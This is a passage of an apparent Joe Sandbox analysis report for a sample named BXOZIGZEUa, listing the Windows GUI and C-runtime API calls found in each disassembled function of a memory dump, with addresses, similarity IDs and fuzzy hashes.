                                                              • Instruction Fuzzy Hash: ABD01271180305AFEB116B46DC05FB63B59DB95719F500C22F905CF191CABAAC90D66A
                                                              APIs
                                                                • Part of subcall function 005CEBA3: __lock.LIBCMT ref: 005CEBA5
                                                              • __onexit_nolock.LIBCMT ref: 005CCD2A
                                                                • Part of subcall function 005CCC2B: DecodePointer.KERNEL32(?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCC40
                                                                • Part of subcall function 005CCC2B: DecodePointer.KERNEL32(?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCC4D
                                                                • Part of subcall function 005CCC2B: __realloc_crt.LIBCMT ref: 005CCC8A
                                                                • Part of subcall function 005CCC2B: __realloc_crt.LIBCMT ref: 005CCCA0
                                                                • Part of subcall function 005CCC2B: EncodePointer.KERNEL32(00000000,?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCCB2
                                                                • Part of subcall function 005CCC2B: EncodePointer.KERNEL32(?,?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCCC6
                                                                • Part of subcall function 005CCC2B: EncodePointer.KERNEL32(-00000004,?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCCCE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                              • String ID:
                                                              • API String ID: 3536590627-0
                                                              • Opcode ID: 5d697106928f9c0c95254077ba9b7328b885a6c6725fbba041de43cf30be19e9
                                                              • Instruction ID: 82c752695371db699c0bf82a935b009ce551b1cb765c85a0a77367c7c8b70f28
                                                              • Opcode Fuzzy Hash: 5d697106928f9c0c95254077ba9b7328b885a6c6725fbba041de43cf30be19e9
                                                              • Instruction Fuzzy Hash: 68D0177090020BEEDB10BBE4D90AF5DBE61BF80311F60416DF029AA1D2CA740A418B00
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 004E0645
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: DeleteObject
                                                              • String ID:
                                                              • API String ID: 1531683806-0
                                                              • Opcode ID: bcc5382eafe289361a990abcebcb3a140bf346389edbfecca0dffea1c624e247
                                                              • Instruction ID: 0a4d7900bbb93e44782ece0713cc93965410783cc803d361895cc32392ad9c7d
                                                              • Opcode Fuzzy Hash: bcc5382eafe289361a990abcebcb3a140bf346389edbfecca0dffea1c624e247
                                                              • Instruction Fuzzy Hash: 52B09270806241AEDE106732890873635546BE030BF108899A011D2041DEBD8096D548
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 0051CF6A
                                                              • IsWindow.USER32(?), ref: 0051CF7F
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 0051CFF0
                                                              • GetMonitorInfoW.USER32(00000000), ref: 0051CFF7
                                                              • CopyRect.USER32(?,?), ref: 0051D009
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0051D019
                                                              • GetSystemMetrics.USER32(00000033), ref: 0051D19D
                                                              • GetSystemMetrics.USER32(00000006), ref: 0051D1A3
                                                              • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0051D228
                                                              • SendMessageW.USER32(?,00000418,00000000,FFFFFFFF), ref: 0051D242
                                                              • SetRectEmpty.USER32(?), ref: 0051D4A5
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0051D50E
                                                              • GetWindowRect.USER32(?,?), ref: 0051D5F1
                                                              • ClientToScreen.USER32(?,?), ref: 0051D83C
                                                              • ClientToScreen.USER32(?,?), ref: 0051D863
                                                              • ClientToScreen.USER32(?,?), ref: 0051D9FC
                                                              • ClientToScreen.USER32(?,?), ref: 0051DA24
                                                              • GetSystemMetrics.USER32(00000002), ref: 0051DABF
                                                              • IsRectEmpty.USER32(?), ref: 0051DACF
                                                              • GetSystemMetrics.USER32(00000002), ref: 0051DADB
                                                              • GetWindowRect.USER32(?,?), ref: 0051DBDB
                                                              • IntersectRect.USER32(?,?,-00000054), ref: 0051DC3C
                                                              • InvalidateRect.USER32(?,-00000054,00000001), ref: 0051DC51
                                                              • UpdateWindow.USER32(?), ref: 0051DC5A
                                                              • IntersectRect.USER32(?,?,-00000054), ref: 0051DCA3
                                                              • InvalidateRect.USER32(?,-00000054,00000001), ref: 0051DCB8
                                                              • UpdateWindow.USER32(?), ref: 0051DCC1
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,?,?,?,00000014,00000000), ref: 0051DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$System$ClientMetricsScreen$EmptyInfoIntersectInvalidateMessageMonitorRedrawSendUpdate$CopyFromParametersPoint
                                                              • String ID: ($(`
                                                              • API String ID: 840757265-3489612758
                                                              • Opcode ID: ac82686d8b3125b12c8afa1e1c57b8448c3dc6c0f0239cd06acfe3a1e7f5f156
                                                              • Instruction ID: 3f8d89e8c7392e3763150dd81677501510e9edaca9d03ebed1a7574d96c0ba6f
                                                              • Opcode Fuzzy Hash: ac82686d8b3125b12c8afa1e1c57b8448c3dc6c0f0239cd06acfe3a1e7f5f156
                                                              • Instruction Fuzzy Hash: F3A22971A00219DFDF15CF68C884BEDBBB1BF48304F1845BAE849AB255DB71A981CF60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0055C7E1
                                                              • GetKeyState.USER32(00000001), ref: 0055C826
                                                              • GetKeyState.USER32(00000002), ref: 0055C833
                                                              • GetKeyState.USER32(00000004), ref: 0055C840
                                                              • GetParent.USER32(?), ref: 0055C865
                                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0055C919
                                                              • _memset.LIBCMT ref: 0055C92D
                                                              • ScreenToClient.USER32(?,?), ref: 0055C954
                                                              • _memset.LIBCMT ref: 0055C962
                                                              • GetCursorPos.USER32(?), ref: 0055C9B8
                                                              • SendMessageW.USER32(?,00000412,00000000,?), ref: 0055C9DC
                                                              • SendMessageW.USER32(?,00000432,00000000,?), ref: 0055CA3C
                                                              • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0055CA62
                                                              • SendMessageW.USER32(?,00000411,00000001,?), ref: 0055CA7E
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0055CA91
                                                              • SendMessageW.USER32(?,00000433,00000000,?), ref: 0055CABC
                                                              • _memset.LIBCMT ref: 0055CAE4
                                                              • _free.LIBCMT ref: 0055CB0E
                                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0055CB25
                                                              • GetParent.USER32(?), ref: 0055CB52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3_ScreenWindow_free
                                                              • String ID: ,
                                                              • API String ID: 2464378573-3772416878
                                                              • Opcode ID: 519eb7502c1c190a6a55ee4d791d551be532df82708a13e8f80c8518071759c0
                                                              • Instruction ID: b783a7c9dbcd07eb2f97ceda94d3d437554827ccc35269d9f0a92d14127c0ff0
                                                              • Opcode Fuzzy Hash: 519eb7502c1c190a6a55ee4d791d551be532df82708a13e8f80c8518071759c0
                                                              • Instruction Fuzzy Hash: F1C18B71A003159FDF20DFA4C899BAD7FB1FB04711F24412AEA15A71A2DB75AC48DF40
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00541086
                                                              • InflateRect.USER32(000000FE,000000FD,00000000), ref: 005410F9
                                                              • GetParent.USER32(?), ref: 005411A5
                                                                • Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_InflateParentRect
                                                              • String ID: ...
                                                              • API String ID: 1906238279-440645147
                                                              • Opcode ID: e7f9509baf35d7709f6c563fb9d522dcc8eff860684cb21dcb88bb165df2b1c8
                                                              • Instruction ID: ae57c0431f533a54bc4dac5698fc101e02634b62c38e92983d149a59d9791e32
                                                              • Opcode Fuzzy Hash: e7f9509baf35d7709f6c563fb9d522dcc8eff860684cb21dcb88bb165df2b1c8
                                                              • Instruction Fuzzy Hash: 8BC25B31900619CFDF25DF65C844BEEBBB6BF49308F2441AAE809AB252DB319D85CF54
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00560844
                                                                • Part of subcall function 00543605: FillRect.USER32(?,00000020), ref: 00543619
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FillH_prolog3Rect
                                                              • String ID: d
                                                              • API String ID: 1863035756-2564639436
                                                              • Opcode ID: 04d353e8da047fd0d6f91cacc4cb5fd3c6a3afccc4a22bd3eaae275bf2f19fef
                                                              • Instruction ID: 201ff978f6cd61e4fe76cb20f6223e1c92932c66cc5c17fe42663fa444a80b97
                                                              • Opcode Fuzzy Hash: 04d353e8da047fd0d6f91cacc4cb5fd3c6a3afccc4a22bd3eaae275bf2f19fef
                                                              • Instruction Fuzzy Hash: 28C1C97190022A9FCB14DFA9CC959BEBFB1FF48304F10462AF452E7291CB388955DBA0
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00510A2B
                                                              • IsRectEmpty.USER32(?), ref: 00510A35
                                                              • IsIconic.USER32(?), ref: 00510A90
                                                              • BeginDeferWindowPos.USER32(00000000), ref: 00510ACA
                                                              • GetClientRect.USER32(?,?), ref: 00510AF4
                                                              • IsRectEmpty.USER32(?), ref: 00510AFE
                                                              • IsRectEmpty.USER32(?), ref: 00510B94
                                                              • EqualRect.USER32(?,?), ref: 00510BD9
                                                              • GetParent.USER32(?), ref: 00510DD5
                                                              • GetWindowRect.USER32(?,?), ref: 00510C80
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139
                                                              • EndDeferWindowPos.USER32(?), ref: 00510EC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$EmptyWindow$DeferScreen$BeginEqualIconicParent
                                                              • String ID: Dc$X`
                                                              • API String ID: 3453398311-1662422523
                                                              • Opcode ID: 3d9bd17d8cac9920f19455193144aacfd8c1d86baac7d26503a76392380e3244
                                                              • Instruction ID: 6ff18f57192a79fab201275eb2f7a11ce47772fdcab56695ad8e3597d36333a7
                                                              • Opcode Fuzzy Hash: 3d9bd17d8cac9920f19455193144aacfd8c1d86baac7d26503a76392380e3244
                                                              • Instruction Fuzzy Hash: 62F19A31A00209DFDF14DFA5C984AEEBBB6BF49304F141529F806AB295DBB0ADC5CB50
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 004F502D
                                                              • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004F5049
                                                              • GetCapture.USER32 ref: 004F50C3
                                                              • GetKeyState.USER32(00000011), ref: 004F5125
                                                              • GetKeyState.USER32(00000010), ref: 004F5132
                                                              • ImmGetContext.IMM32(?), ref: 004F5140
                                                              • ImmGetOpenStatus.IMM32(00000000,?), ref: 004F514D
                                                              • ImmReleaseContext.IMM32(?,00000000,?), ref: 004F516F
                                                              • GetFocus.USER32 ref: 004F5199
                                                              • IsWindow.USER32(?), ref: 004F51DA
                                                              • IsWindow.USER32(?), ref: 004F5260
                                                              • ClientToScreen.USER32(?,?), ref: 004F5270
                                                              • IsWindow.USER32(?), ref: 004F5296
                                                              • ClientToScreen.USER32(?,?), ref: 004F52C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
                                                              • String ID:
                                                              • API String ID: 1155058817-0
                                                              • Opcode ID: 1fdd139f4a0bb9c27b635ee1f19f0256fa8ce54e443f687fe95b984c2ccafed6
                                                              • Instruction ID: 20ecc6699b27c1d516d9a545119f8091cfbc0dc38f416b9341769c89f34a88be
                                                              • Opcode Fuzzy Hash: 1fdd139f4a0bb9c27b635ee1f19f0256fa8ce54e443f687fe95b984c2ccafed6
                                                              • Instruction Fuzzy Hash: DFA1DF31900A0AAFDF249FA0D984ABF77B5FF44304F10452BE75AD22A1DB39E940DB59
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 004F316D
                                                              • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004F3189
                                                              • GetCapture.USER32 ref: 004F3209
                                                              • GetKeyState.USER32(00000011), ref: 004F325C
                                                              • GetKeyState.USER32(00000010), ref: 004F3269
                                                              • ImmGetContext.IMM32(?), ref: 004F3277
                                                              • ImmGetOpenStatus.IMM32(00000000,?), ref: 004F3284
                                                              • ImmReleaseContext.IMM32(00000000,00000000,?), ref: 004F32A6
                                                              • GetFocus.USER32 ref: 004F32D0
                                                              • IsWindow.USER32(?), ref: 004F3311
                                                              • IsWindow.USER32(?), ref: 004F3397
                                                              • ClientToScreen.USER32(?,?), ref: 004F33A7
                                                              • IsWindow.USER32(?), ref: 004F33CD
                                                              • ClientToScreen.USER32(?,?), ref: 004F33FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
                                                              • String ID:
                                                              • API String ID: 1155058817-0
                                                              • Opcode ID: dde848cda4f5c491fe21bd7d9e90544ba9c13481378aa5c2ec0b38f4e38d0f32
                                                              • Instruction ID: 40ed165370cc998cdf36bfa2fcfa4a6001a9d4159f698ed43d69b5782c54b90a
                                                              • Opcode Fuzzy Hash: dde848cda4f5c491fe21bd7d9e90544ba9c13481378aa5c2ec0b38f4e38d0f32
                                                              • Instruction Fuzzy Hash: 6091C67550020AEFDF249FA1C984A7BBBA5FF04306F10852BE696D1261DB39DF90DB09
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 004FB7AD
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 004FB7CB
                                                              • ReleaseCapture.USER32 ref: 004FB7D1
                                                              • SetCapture.USER32(?), ref: 004FB7E4
                                                              • ReleaseCapture.USER32 ref: 004FB859
                                                              • SetCapture.USER32(?), ref: 004FB86C
                                                              • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 004FB945
                                                              • UpdateWindow.USER32(?), ref: 004FB9A8
                                                              • SendMessageW.USER32(?,00000111,000000FF,00000000), ref: 004FB9F0
                                                              • IsWindow.USER32(?), ref: 004FB9FB
                                                              • IsIconic.USER32(?), ref: 004FBA08
                                                              • IsZoomed.USER32(?), ref: 004FBA15
                                                              • IsWindow.USER32(?), ref: 004FBA29
                                                              • UpdateWindow.USER32(?), ref: 004FBA75
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
                                                              • String ID:
                                                              • API String ID: 2500574155-0
                                                              • Opcode ID: 9abe4d7327ecbeb4991ccfb55ba8a99208d91bbf6f47ab8482872958879b931c
                                                              • Instruction ID: d315d98f0dba16f10841fa086005e21e92adb4ad0ce94e99e646ef3301c3b509
                                                              • Opcode Fuzzy Hash: 9abe4d7327ecbeb4991ccfb55ba8a99208d91bbf6f47ab8482872958879b931c
                                                              • Instruction Fuzzy Hash: 96A15B70600208AFCF11AF65CC88ABE3BA6FF45354F14417AFE199B2A6CB39D904DB54
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00537133
                                                              • SetRectEmpty.USER32(?), ref: 0053714C
                                                              • InflateRect.USER32(?,000000FE,00000000), ref: 005371A0
                                                              • OffsetRect.USER32(?,00000000,00000000), ref: 00537392
                                                              • GetSystemMetrics.USER32(00000002), ref: 005373DB
                                                              • InflateRect.USER32(?,00000000,00000000), ref: 00537404
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 005375D1
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 005375E0
                                                              • GetClientRect.USER32(?,?), ref: 005375FB
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 00537627
                                                              • UpdateWindow.USER32(?), ref: 00537630
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Inflate$ClientInvalidate$EmptyMetricsOffsetSystemUpdateWindow
                                                              • String ID:
                                                              • API String ID: 159692204-0
                                                              • Opcode ID: b04fd5dacb1a5a946ba65b4d278ed273955974d4c3d225340f79b1beb8686b6b
                                                              • Instruction ID: 7250b212b344c1ad942d35539113639eec72745b095c32693ce18987f6398165
                                                              • Opcode Fuzzy Hash: b04fd5dacb1a5a946ba65b4d278ed273955974d4c3d225340f79b1beb8686b6b
                                                              • Instruction Fuzzy Hash: EC0208B1D04519DFCF25DF68C9C8AA97BB5FB49300F1845BAEC099F24ADB30A945CB60
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 00522752
                                                              • GetFocus.USER32 ref: 00522760
                                                              • IsChild.USER32(?,?), ref: 00522794
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 005227C8
                                                              • IsChild.USER32(?,?), ref: 005227E4
                                                              • SendMessageW.USER32(?,00000100,?,00000000), ref: 00522813
                                                              • IsIconic.USER32(?), ref: 00522854
                                                              • GetAsyncKeyState.USER32(00000011), ref: 005228DA
                                                              • GetAsyncKeyState.USER32(00000012), ref: 005228EC
                                                              • GetAsyncKeyState.USER32(00000010), ref: 005228F9
                                                              • IsWindowVisible.USER32(?), ref: 0052295A
                                                                • Part of subcall function 0052F443: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0052F470
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
